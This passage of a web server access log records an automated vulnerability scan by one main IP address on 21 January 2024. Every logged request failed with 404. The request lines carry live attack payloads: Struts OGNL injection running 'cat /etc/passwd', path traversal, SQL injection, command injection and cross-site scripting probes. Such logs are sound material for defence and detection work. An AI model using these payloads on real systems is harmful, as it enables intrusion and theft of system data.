29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:08 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:29 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:35 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:49 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:59:51 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:12 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:14 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:16 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:32 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:35 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:45 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:47 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:58 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:00:59 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:07 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:09 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:28 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:30 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:36 +0100] "GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:01:38 +0100] "GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:11 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:13 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:13 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:14 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:16 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:24 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:37 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:40 +0100] "POST /jars/upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:02:42 +0100] "GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:04:00 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:04:05 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:04:07 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:04:49 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:12 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:28 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:28 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:38 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:42 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:05:49 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:02 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:25 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:31 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:36 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:38 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:40 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:40 +0100] "GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:06:55 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:08 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:18 +0100] "GET /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:20 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:20 +0100] "POST /fuel/login/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:22 +0100] "GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:34 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:07:49 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:08:03 +0100] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:09:03 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:09:14 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:09:54 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:09:56 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:10:05 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:10:29 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:10:47 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:04 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:12 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:17 +0100] "GET /tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:50 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:52 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:11:56 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:12:08 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:12:33 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:12:49 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:02 +0100] "POST /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:25 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:33 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:36 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:40 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:45 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:49 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:52 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:58 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:13:58 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:14:00 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:14:05 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:14:24 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:14:26 +0100] "GET /admin/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:14:28 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:16:35 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:16:48 +0100] "GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:16:59 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:17:07 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:17:43 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:17:52 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:17:57 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:18:22 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:18:40 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:18:51 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:19:06 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:19:12 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:19:14 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:19:17 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:19:29 +0100] "POST /forgot_password.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:20:38 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:20:50 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:21:03 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:22:30 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
46.174.191.28 - - [21/Jan/2024:18:22:53 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:18:23:41 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:23:53 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:24:07 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:24:40 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:24:52 +0100] "GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:24:57 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:25:19 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
198.199.119.15 - - [21/Jan/2024:18:25:36 +0100] "GET /hudson HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:25:59 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:26:12 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:26:12 +0100] "POST /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:26:27 +0100] "GET /plus/ajax_street.php?act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:26:49 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:28:16 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:28:27 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:28:40 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:29:08 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
165.227.24.245 - - [21/Jan/2024:18:30:26 +0100] "POST /v1/statement HTTP/1.1" 404 952
74.207.252.222 - - [21/Jan/2024:18:30:31 +0100] "GET / HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET / HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET /auth.html HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET /auth1.html HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET /sslvpnLogin.html HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET /api/sonicos/auth HTTP/1.1" 404 952
139.144.170.152 - - [21/Jan/2024:18:30:33 +0100] "GET /api/sonicos/tfa HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:31:00 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
45.33.93.106 - - [21/Jan/2024:18:31:09 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:18:31:14 +0100] "GET /plus/ajax_officebuilding.php?act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:31:45 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:32:36 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:32:58 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
144.131.40.30 - - [21/Jan/2024:18:33:19 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:34:45 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:34:47 +0100] "POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:36:41 +0100] "GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:37:13 +0100] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:18:37:36 +0100] "POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1" 404 952
